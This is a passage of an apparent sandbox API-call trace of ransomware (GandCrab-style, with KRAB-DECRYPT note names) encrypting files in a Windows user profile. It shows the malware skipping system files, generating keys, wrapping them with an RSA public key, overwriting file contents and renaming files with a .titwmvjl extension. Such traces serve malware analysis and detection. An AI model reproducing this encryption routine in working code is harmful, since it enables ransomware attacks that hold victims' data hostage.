(lpString1="NTUSER.DAT.LOG2", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0096.504] lstrcmpiW (lpString1="NTUSER.DAT.LOG2", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0096.504] lstrcmpiW (lpString1="NTUSER.DAT.LOG2", lpString2="KRAB-DECRYPT.html") returned 1 [0096.504] lstrcmpiW (lpString1="NTUSER.DAT.LOG2", lpString2="CRAB-DECRYPT.html") returned 1 [0096.504] lstrcmpiW (lpString1="NTUSER.DAT.LOG2", lpString2="KRAB-DECRYPT.txt") returned 1 [0096.504] lstrcmpiW (lpString1="NTUSER.DAT.LOG2", lpString2="CRAB-DECRYPT.txt") returned 1 [0096.504] lstrcmpiW (lpString1="NTUSER.DAT.LOG2", lpString2="ntldr") returned 1 [0096.504] lstrcmpiW (lpString1="NTUSER.DAT.LOG2", lpString2="NTDETECT.COM") returned 1 [0096.504] lstrcmpiW (lpString1="NTUSER.DAT.LOG2", lpString2="Bootfont.bin") returned 1 [0096.504] lstrlenW (lpString="C:\\Users\\Default\\NTUSER.DAT.LOG2") returned 32 [0096.505] lstrlenW (lpString=".LOG2") returned 5 [0096.505] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0096.505] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".LOG2 ") returned 6 [0096.505] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.505] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0096.505] CreateFileW (lpFileName="C:\\Users\\Default\\NTUSER.DAT.LOG2" (normalized: "c:\\users\\default\\ntuser.dat.log2"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x230 [0096.506] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0096.506] ReadFile (in: hFile=0x230, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259f704, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259f704*=0x21c, lpOverlapped=0x0) returned 1 [0096.517] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0096.518] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0096.518] CryptAcquireContextW (in: phProv=0x259f634, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f634*=0x4c9980) returned 1 [0096.518] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0096.518] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0096.519] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0096.519] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259f6c0 | out: pbBuffer=0x259f6c0) returned 1 [0096.519] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0096.519] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0096.519] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.519] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0096.519] CryptAcquireContextW (in: phProv=0x259f634, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f634*=0x4c9980) returned 1 [0096.520] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0096.520] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0096.520] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0096.520] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259f6e0 | out: pbBuffer=0x259f6e0) returned 1 [0096.520] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0096.520] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0096.520] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.520] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0096.520] CryptAcquireContextW (in: phProv=0x259f628, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f628*=0x4c9980) returned 1 [0096.521] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0096.521] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f62c | out: phKey=0x259f62c*=0x5035b8) returned 1 [0096.521] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0096.521] CryptGetKeyParam (in: hKey=0x5035b8, dwParam=0x8, pbData=0x259f620, pdwDataLen=0x259f624, dwFlags=0x0 | out: pbData=0x259f620*=0x800, pdwDataLen=0x259f624*=0x4) returned 1 [0096.521] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0096.521] CryptEncrypt (in: hKey=0x5035b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259f658*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259f658*=0x100) returned 1 [0096.521] GetLastError () returned 0x0 [0096.521] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0096.522] CryptDestroyKey (hKey=0x5035b8) returned 1 [0096.522] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0096.522] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0096.522] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0096.522] CryptAcquireContextW (in: phProv=0x259f628, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f628*=0x4c9980) returned 1 [0096.522] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0096.522] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f62c | out: phKey=0x259f62c*=0x5032f8) returned 1 [0096.522] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0096.522] CryptGetKeyParam (in: hKey=0x5032f8, dwParam=0x8, pbData=0x259f620, pdwDataLen=0x259f624, dwFlags=0x0 | out: pbData=0x259f620*=0x800, pdwDataLen=0x259f624*=0x4) returned 1 [0096.523] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0096.523] CryptEncrypt (in: hKey=0x5032f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259f658*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259f658*=0x100) returned 1 [0096.523] GetLastError () returned 0x0 [0096.523] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0096.523] CryptDestroyKey (hKey=0x5032f8) returned 1 [0096.523] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0096.523] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0096.523] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0096.523] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0096.524] ReadFile (in: hFile=0x230, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259f704, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259f704*=0x7e000, lpOverlapped=0x0) returned 1 [0096.552] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0xfff82000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0096.552] WriteFile (in: hFile=0x230, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x7e000, lpNumberOfBytesWritten=0x259f6e8, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259f6e8*=0x7e000, lpOverlapped=0x0) returned 1 [0096.556] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0096.556] WriteFile (in: hFile=0x230, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259f6e8, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259f6e8*=0x21c, lpOverlapped=0x0) returned 1 [0096.601] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.605] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.607] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.607] CloseHandle (hObject=0x230) returned 1 [0096.607] MoveFileExW (lpExistingFileName="C:\\Users\\Default\\NTUSER.DAT.LOG2" (normalized: "c:\\users\\default\\ntuser.dat.log2"), lpNewFileName="C:\\Users\\Default\\NTUSER.DAT.LOG2.titwmvjl" (normalized: "c:\\users\\default\\ntuser.dat.log2.titwmvjl"), dwFlags=0x1) returned 1 [0096.608] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.608] FindNextFileW (in: hFindFile=0x503578, lpFindFileData=0x259f7b8 | out: lpFindFileData=0x259f7b8) returned 1 [0096.608] lstrcmpW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TM.blf", lpString2=".") returned 1 [0096.608] lstrcmpW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TM.blf", lpString2="..") returned 1 [0096.608] lstrcatW (in: lpString1="C:\\Users\\Default\\", lpString2="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TM.blf" | out: lpString1="C:\\Users\\Default\\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TM.blf") returned="C:\\Users\\Default\\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TM.blf" [0096.608] lstrlenW (lpString=".titwmvjl") returned 9 [0096.608] lstrlenW (lpString="C:\\Users\\Default\\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TM.blf") returned 72 [0096.608] VirtualAlloc (lpAddress=0x0, dwSize=0xd0, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0096.609] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\Default\\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TM.blf.titwmvjl") returned 81 [0096.609] lstrlenW (lpString="C:\\Users\\Default\\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TM.blf") returned 72 [0096.609] lstrlenW (lpString=".blf") returned 4 [0096.609] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0096.609] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".blf ") returned 5 [0096.609] lstrcmpiW (lpString1=".blf", lpString2=".titwmvjl") returned -1 [0096.609] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.609] lstrlenW (lpString="C:\\Users\\Default\\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TM.blf") returned 72 [0096.609] lstrlenW (lpString="C:\\Users\\Default\\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TM.blf") returned 72 [0096.609] lstrcmpiW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TM.blf", lpString2="desktop.ini") returned 1 [0096.609] lstrcmpiW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TM.blf", lpString2="autorun.inf") returned 1 [0096.609] lstrcmpiW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TM.blf", lpString2="ntuser.dat") returned 1 [0096.609] lstrcmpiW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TM.blf", lpString2="iconcache.db") returned 1 [0096.609] lstrcmpiW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TM.blf", lpString2="bootsect.bak") returned 1 [0096.609] lstrcmpiW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TM.blf", lpString2="boot.ini") returned 1 [0096.609] lstrcmpiW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TM.blf", lpString2="ntuser.dat.log") returned 1 [0096.609] lstrcmpiW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TM.blf", lpString2="thumbs.db") returned -1 [0096.609] lstrcmpiW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TM.blf", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0096.609] lstrcmpiW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TM.blf", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0096.609] lstrcmpiW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TM.blf", lpString2="KRAB-DECRYPT.html") returned 1 [0096.609] lstrcmpiW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TM.blf", lpString2="CRAB-DECRYPT.html") returned 1 [0096.609] lstrcmpiW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TM.blf", lpString2="KRAB-DECRYPT.txt") returned 1 [0096.609] lstrcmpiW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TM.blf", lpString2="CRAB-DECRYPT.txt") returned 1 [0096.609] lstrcmpiW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TM.blf", lpString2="ntldr") returned 1 [0096.609] lstrcmpiW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TM.blf", lpString2="NTDETECT.COM") returned 1 [0096.609] lstrcmpiW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TM.blf", lpString2="Bootfont.bin") returned 1 [0096.609] lstrlenW (lpString="C:\\Users\\Default\\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TM.blf") returned 72 [0096.609] lstrlenW (lpString=".blf") returned 4 [0096.609] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0096.610] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".blf ") returned 5 [0096.610] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.610] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0096.610] CreateFileW (lpFileName="C:\\Users\\Default\\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TM.blf" (normalized: "c:\\users\\default\\ntuser.dat{77a2c7ed-26f0-11e5-80da-e41d2d741090}.tm.blf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x230 [0096.610] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0096.610] ReadFile (in: hFile=0x230, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259f704, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259f704*=0x21c, lpOverlapped=0x0) returned 1 [0096.628] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0096.628] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0096.628] CryptAcquireContextW (in: phProv=0x259f634, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f634*=0x4c9980) returned 1 [0096.628] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0096.629] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0096.629] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0096.629] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259f6c0 | out: pbBuffer=0x259f6c0) returned 1 [0096.629] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0096.629] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0096.629] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.629] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0096.629] CryptAcquireContextW (in: phProv=0x259f634, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f634*=0x4c9980) returned 1 [0096.630] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0096.630] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0096.630] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0096.630] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259f6e0 | out: pbBuffer=0x259f6e0) returned 1 [0096.630] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0096.630] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0096.630] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.630] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0096.631] CryptAcquireContextW (in: phProv=0x259f628, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f628*=0x4c9980) returned 1 [0096.631] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0096.631] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f62c | out: phKey=0x259f62c*=0x503678) returned 1 [0096.631] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0096.631] CryptGetKeyParam (in: hKey=0x503678, dwParam=0x8, pbData=0x259f620, pdwDataLen=0x259f624, dwFlags=0x0 | out: pbData=0x259f620*=0x800, pdwDataLen=0x259f624*=0x4) returned 1 [0096.631] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0096.631] CryptEncrypt (in: hKey=0x503678, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259f658*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259f658*=0x100) returned 1 [0096.632] GetLastError () returned 0x0 [0096.632] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0096.632] CryptDestroyKey (hKey=0x503678) returned 1 [0096.632] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0096.632] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0096.632] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0096.632] CryptAcquireContextW (in: phProv=0x259f628, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f628*=0x4c9980) returned 1 [0096.632] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0096.632] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f62c | out: phKey=0x259f62c*=0x503338) returned 1 [0096.633] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0096.633] CryptGetKeyParam (in: hKey=0x503338, dwParam=0x8, pbData=0x259f620, pdwDataLen=0x259f624, dwFlags=0x0 | out: pbData=0x259f620*=0x800, pdwDataLen=0x259f624*=0x4) returned 1 [0096.633] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0096.633] CryptEncrypt (in: hKey=0x503338, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259f658*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259f658*=0x100) returned 1 [0096.633] GetLastError () returned 0x0 [0096.633] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0096.633] CryptDestroyKey (hKey=0x503338) returned 1 [0096.633] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0096.633] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0096.633] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0096.634] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0096.634] ReadFile (in: hFile=0x230, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259f704, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259f704*=0x10000, lpOverlapped=0x0) returned 1 [0096.642] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0xffff0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0096.642] WriteFile (in: hFile=0x230, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x10000, lpNumberOfBytesWritten=0x259f6e8, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259f6e8*=0x10000, lpOverlapped=0x0) returned 1 [0096.645] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0096.645] WriteFile (in: hFile=0x230, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259f6e8, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259f6e8*=0x21c, lpOverlapped=0x0) returned 1 [0096.647] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.650] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.651] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.651] CloseHandle (hObject=0x230) returned 1 [0096.653] MoveFileExW (lpExistingFileName="C:\\Users\\Default\\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TM.blf" (normalized: "c:\\users\\default\\ntuser.dat{77a2c7ed-26f0-11e5-80da-e41d2d741090}.tm.blf"), lpNewFileName="C:\\Users\\Default\\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TM.blf.titwmvjl" (normalized: "c:\\users\\default\\ntuser.dat{77a2c7ed-26f0-11e5-80da-e41d2d741090}.tm.blf.titwmvjl"), dwFlags=0x1) returned 1 [0096.654] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.654] FindNextFileW (in: hFindFile=0x503578, lpFindFileData=0x259f7b8 | out: lpFindFileData=0x259f7b8) returned 1 [0096.654] lstrcmpW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000001.regtrans-ms", lpString2=".") returned 1 [0096.654] lstrcmpW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000001.regtrans-ms", lpString2="..") returned 1 [0096.654] lstrcatW (in: lpString1="C:\\Users\\Default\\", lpString2="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000001.regtrans-ms" | out: lpString1="C:\\Users\\Default\\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000001.regtrans-ms") returned="C:\\Users\\Default\\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000001.regtrans-ms" [0096.654] lstrlenW (lpString=".titwmvjl") returned 9 [0096.654] lstrlenW (lpString="C:\\Users\\Default\\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000001.regtrans-ms") returned 109 [0096.654] VirtualAlloc (lpAddress=0x0, dwSize=0x11a, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0096.655] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\Default\\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000001.regtrans-ms.titwmvjl") returned 118 [0096.655] lstrlenW (lpString="C:\\Users\\Default\\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000001.regtrans-ms") returned 109 [0096.655] lstrlenW (lpString=".regtrans-ms") returned 12 [0096.655] VirtualAlloc (lpAddress=0x0, dwSize=0x1c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0096.655] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".regtrans-ms ") returned 13 [0096.655] lstrcmpiW (lpString1=".regtrans-ms", lpString2=".titwmvjl") returned -1 [0096.655] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.655] lstrlenW (lpString="C:\\Users\\Default\\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000001.regtrans-ms") returned 109 [0096.655] lstrlenW (lpString="C:\\Users\\Default\\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000001.regtrans-ms") returned 109 [0096.655] lstrcmpiW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000001.regtrans-ms", lpString2="desktop.ini") returned 1 [0096.655] lstrcmpiW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000001.regtrans-ms", lpString2="autorun.inf") returned 1 [0096.655] lstrcmpiW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000001.regtrans-ms", lpString2="ntuser.dat") returned 1 [0096.655] lstrcmpiW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000001.regtrans-ms", lpString2="iconcache.db") returned 1 [0096.655] lstrcmpiW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000001.regtrans-ms", lpString2="bootsect.bak") returned 1 [0096.655] lstrcmpiW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000001.regtrans-ms", lpString2="boot.ini") returned 1 [0096.655] lstrcmpiW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000001.regtrans-ms", lpString2="ntuser.dat.log") returned 1 [0096.655] lstrcmpiW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000001.regtrans-ms", lpString2="thumbs.db") returned -1 [0096.655] lstrcmpiW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000001.regtrans-ms", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0096.655] lstrcmpiW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000001.regtrans-ms", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0096.655] lstrcmpiW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000001.regtrans-ms", lpString2="KRAB-DECRYPT.html") returned 1 [0096.655] lstrcmpiW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000001.regtrans-ms", lpString2="CRAB-DECRYPT.html") returned 1 [0096.655] lstrcmpiW 